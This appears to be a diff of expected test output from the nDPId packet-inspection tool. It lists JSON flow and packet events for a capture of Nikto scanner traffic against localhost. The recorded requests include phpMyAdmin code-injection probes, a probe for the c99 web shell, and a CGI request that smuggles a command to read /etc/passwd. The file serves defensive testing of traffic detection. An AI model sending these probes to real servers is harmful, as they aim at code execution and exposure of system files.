{"hostname":"127.0.0.1","url":"127.0.0.1\/login.php?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006524)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006524)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277919,"pkt":"AAAAAAAAAAAAAAAACABFAADk1ppAAEAGZXd\/AAABfwAAAceKH5AeVe\/gFGxiPoAYAED+2AAAAQEICp1m\/8adZv\/GR0VUIC8zcmRwYXJ0eS9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 
+01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277920,"pkt":"AAAAAAAAAAAAAAAACABFAADbRbxAAEAG9l5\/AAABfwAAAceMH5CzBHzzJnp1p4AYAED+zwAAAQEICp1m\/8idZv\/IR0VUIC9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 
+01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277922,"pkt":"AAAAAAAAAAAAAAAACABFAADkm4xAAEAGoIV\/AAABfwAAAceOH5AOOaLD4MTa7oAYAED+2AAAAQEICp1m\/8qdZv\/KR0VUIC8zcmRwYXJ0eS9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 
+01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7580000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277923,"pkt":"AAAAAAAAAAAAAAAACABFAADb3d5AAEAGXjx\/AAABfwAAAceQH5AJweSWVSMF84AYAED+zwAAAQEICp1m\/8udZv\/LR0VUIC9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 
+01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7580000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":1576420277925,"pkt":"AAAAAAAAAAAAAAAACABFAADU+B5AAEAGRAN\/AAABfwAAAceSH5DHT8FWYmCfAYAYAED+yAAAAQEICp1m\/82dZv\/NR0VUIC9wbWEvc2VydmVyX3N5bmMucGhwP2M9cGhwaW5mbygpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY2MDgpDQoNCg=="} -01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pma\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 
+01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7580000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pma\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277926,"pkt":"AAAAAAAAAAAAAAAACABFAAC8cdVAAEAGymR\/AAABfwAAAceUH5AbWUib+wxcy4AYAED+sAAAAQEICp1m\/86dZv\/OR0VUIC9jOTkucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY3MzkpDQoNCg=="} -01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c99.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006739)"}} 
+01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c99.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006739)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1576420277928,"pkt":"AAAAAAAAAAAAAAAACABFAAD73s9AAEAGXSt\/AAABfwAAAceWH5B+NOeIVrpz2oAYAED+7wAAAQEICp1m\/9CdZv\/PR0VUIC9hd2N1c2VyL2NnaS1iaW4vdmNzP3hzbD0vdmNzL3Zjc19ob21lLnhzbCUyNmNhdCUyMCUyMi9ldGMvcGFzc3dkJTIyJTI2IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/awcuser\/cgi-bin\/vcs?xsl=\/vcs\/vcs_home.xsl%26cat%20%22\/etc\/passwd%22%26","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006994)"}} 
+01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/awcuser\/cgi-bin\/vcs?xsl=\/vcs\/vcs_home.xsl%26cat%20%22\/etc\/passwd%22%26","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006994)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
